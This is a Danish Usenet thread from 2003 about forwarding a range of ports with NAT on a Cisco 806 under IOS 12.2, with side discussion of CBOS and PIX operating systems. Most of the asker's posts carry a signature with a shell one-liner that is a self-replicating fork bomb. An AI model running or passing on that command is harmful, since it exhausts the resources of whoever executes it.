NAT på Cisco 806 m. IOS 12.2
Fra : Michal

Dato : 20-03-03 18:31

Hej NG

Jeg er igang med at NATe lidt flere porte, og tænkte at der garanteret er en
måde hvorpå man kan NATe en hel range frem for en enkelt port ad gangen...

ip nat inside source static tcp 192.168.1.4 26000 interface Dialer1 26000

bruger jeg lige nu, men jeg kan ikke se nogen måde hvorpå man kan definere
en hel range :/

Udstyr:
Cisco 806
IOS 12.2(1)XE

--
På forhånd tak
MW

Fra : Michal

Dato : 23-03-03 13:38

In news:b5ct4m$mgf$1@sunsite.dk,
Michal <mike_w13@mail.dk> wrote:

> Jeg er igang med at NATe lidt flere porte, og tænkte at der
> garanteret er en måde hvorpå man kan NATe en hel range frem for en
> enkelt port ad gangen...

Hvis der ikke er nogen som kan svare på det, er der så i det mindste ikke
nogen som kan give et hint om hvor jeg så skal spørge henne?

--
Michal
[ echo "\$0&\$0" > _; chmod +x _; ./_ ]

Fra : Thunderbird[7100]

Dato : 23-03-03 14:08

On Sun, 23 Mar 2003 13:37:51 +0100, "Michal"
<nonexistant@fakedomain.INVALID> wrote:

>Hvis der ikke er nogen som kan svare på det, er der så i det mindste ikke
>nogen som kan give et hint om hvor jeg så skal spørge henne?

jeg vil gætte på at hvis du tog og kigge lidt inde på Cybercitys support
sider at så ville du finde det du skal bruge.

Hver gang at nogle nævner Cisco så kommer jeg næsten altid til at tænke
på Cybercitys gode side netop angående opsætning af Cisco routere.
Flemming Jacobsen

Fra : Michal

Dato : 23-03-03 16:34

In news:ubcr7v0ogeh2psnbtktmtr3g10ce4fhj32@4ax.com,
Thunderbird[7100] <praetorian[Spam Frabedes]@tnfs.dk> wrote:

> [...]
>
> Hver gang at nogle nævner Cisco så kommer jeg næsten altid til at
> tænke på Cybercitys gode side netop angående opsætning af Cisco

Har du en link til denne cisco guide som cybercity har?

Jeg tror dog næppe at den kan besvare mit spørgsmål, men det er da forsøget
værd :)

--
Michal
[ echo "\$0&\$0" > _; chmod +x _; ./_ ]

Fra : Thunderbird[7100]

Dato : 23-03-03 16:50

On Sun, 23 Mar 2003 16:34:18 +0100, "Michal"
<nonexistant@fakedomain.INVALID> wrote:

>Har du en link til denne cisco guide som cybercity har?

http://www.cybercity.dk/privat/support/adsl_udstyr/cisco_677/port_forwarding/

Dette link omhandler Port Forwarding, og udfra hvad jeg kan se kan man
godt forwarde Ip ranges. Dette er hvad Cybercity skriver:

"I de nyere CBOS versioner (2.4.1 og op) er det muligt at angive ranges
af porte. Derfor vil NAT entries til Microsoft GamingZone se således
ud:"
Flemming Jacobsen

Fra : Michal

Dato : 23-03-03 17:19

In news:splr7vo1ihfs70dfij42c4m9il140f188a@4ax.com,

/

> [...]
> ranges
> af porte. Derfor vil NAT entries til Microsoft GamingZone se således

Som jeg har skrevet i mit første indlæg bruger min Cisco router, ciscos eget
OS, nemlig IOS... hvad CBOS er aner jeg ikke, men jeg kan som cybercity
skriver ikke skrive:
set nat entry add <lokal-IP> <port der skal forwardes til> <Routerens
yderside IP> <port trafikken kommer ind på> <trafiktype>

som jeg også har skrevet tidligere, skriver jeg:
ip nat inside source static tcp 192.168.1.4 26000 interface Dialer1 26000
hvilket er IOS 12.2 måden at gøre det på...

Og derfor kan jeg desværre heller ikke bruge cybercitys guide...

--
Michal
[ echo "\$0&\$0" > _; chmod +x _; ./_ ]

Fra : Thunderbird[7100]

Dato : 23-03-03 17:49

On Sun, 23 Mar 2003 17:19:21 +0100, "Michal"
> [...]

>hvilket er IOS 12.2 måden at gøre det på...
>
>Og derfor kan jeg desværre heller ikke bruge cybercitys guide...

Men at CBOS er routeren OS version. Og mener at alle Cisco routere har
CBOS!
Flemming Jacobsen

Fra : Jesper Skriver

Dato : 23-03-03 18:09

On Sun, 23 Mar 2003 17:48:36 +0100, Thunderbird[7100] wrote:

> Men at CBOS er routeren OS version. Og mener at alle Cisco routere har
> CBOS!

Nej, CBOS bruges kun paa 6xx serien, som stammer fra et opkoeb, og
ikke er noget Cisco selv har udviklet.

IOS er hvad langt de fleste Cisco routere bruger.

--
Jesper Skriver, CCIE #5456
FreeBSD committer

Fra : Michal

Dato : 23-03-03 19:02

In news:slrnb7rqgn.flh.harvest@freesbee.wheel.dk,
Jesper Skriver <harvest@wheel.dk> wrote:

> Nej, CBOS bruges kun paa 6xx serien, som stammer fra et opkoeb, og
> ikke er noget Cisco selv har udviklet.
>
> IOS er hvad langt de fleste Cisco routere bruger.

Hvis ikke alle... Selv Cisco's PIX'er bruger IOS, dog en lidt anden
version...

--
Michal
[ echo "\$0&\$0" > _; chmod +x _; ./_ ]

Fra : Asbjorn Hojmark

Dato : 23-03-03 23:03

On Sun, 23 Mar 2003 19:02:08 +0100, "Michal"
<nonexistant@fakedomain.INVALID> wrote:

> Selv Cisco's PIX'er bruger IOS, dog en lidt anden version...

PIX'ens OS hedder faktisk Finesse, omend det i dag oftest omtales
som PIXOS. IOS er det i hvert fald ikke, og CLI'et er væsentligt
forskelligt fra, hvad der findes i IOS.

-A
Links : http://www.hojmark.net/
FAQ : http://www.net-faq.dk/

Fra : Michal

Dato : 23-03-03 23:42

In news:3jbs7vsqs41rok0n5v6f0m8h5hn3rc8n64@news.cybercity.dk,
Asbjorn Hojmark <Asbjorn@Hojmark.ORG> wrote:

> PIX'ens OS hedder faktisk Finesse, omend det i dag oftest omtales
> som PIXOS. IOS er det i hvert fald ikke

Vidste jeg ikke

> , og CLI'et er væsentligt
> forskelligt fra, hvad der findes i IOS.

det vidste jeg dog :)

--
Michal
[ echo "\$0&\$0" > _; chmod +x _; ./_ ]

Fra : Thunderbird[7100]

Dato : 23-03-03 22:40

On 23 Mar 2003 17:08:39 GMT, Jesper Skriver <harvest@wheel.dk> wrote:

>Nej, CBOS bruges kun paa 6xx serien, som stammer fra et opkoeb, og
>ikke er noget Cisco selv har udviklet.
>
>IOS er hvad langt de fleste Cisco routere bruger.

ok, var da træls at de ikke bruger det samme over hele linien, nu havde
jeg lige vænnet mig til måden at konfigurere Cisco routers gennem CBOS.
Flemming Jacobsen